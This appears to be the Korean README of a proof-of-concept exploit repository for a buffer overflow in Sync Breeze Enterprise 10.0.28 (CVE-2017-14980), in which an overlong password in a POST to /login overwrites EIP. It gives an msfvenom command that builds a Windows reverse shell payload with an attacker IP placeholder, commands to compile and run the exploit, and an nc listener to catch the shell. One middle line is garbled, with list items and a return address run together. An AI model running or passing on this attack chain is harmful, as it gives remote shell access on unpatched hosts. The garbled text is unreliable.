
개념 증명 버퍼 오버플로 익스플로잇 for Sync Breeze Enterprise v10.0.28 (CVE-2017-14980). 조작된 HTTP POST 페이로드를 전송하여 EIP를 덮어쓰고 사용자 정의 x86 셸코드를 실행하여 임의 코드 실행을 수행합니다.
이 저장소는 CVE-2017-14980으로 식별된 취약점을 대상으로 Sync Breeze Enterprise 버전 10.0.28에 대한 개념 증명 **버퍼 오버플로우 익스플로잇(BOF)**을 포함합니다.
이 취약점은 /login 엔드포인트에 대한 POST 요청에서 password 필드를 처리할 때 부적절한 입력 검증으로 인해 존재합니다.
공격자는 이 필드에 지나치게 긴 값을 보내 EIP를 덮어쓰고 임의 코드 실행을 가능하게 할 수 있습니다.
이 익스플로잇은 다음으로 구성된 신중하게 조작된 페이로드를 전송합니다:
'A')password 필드에 페이로드를 포함한 HTTP POST 요청을 전송합니다.gcc)\x83\x0C\x09\x10) 및 셸코드 조정msfvenom을 사용한 셸코드 생성 예시:
msfvenom -p windows/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 EXITFUNC=thread -b "\x00\x0a\x0d" -f c
gcc exploit.c -o exploit
./exploit
nc -nlvp 4444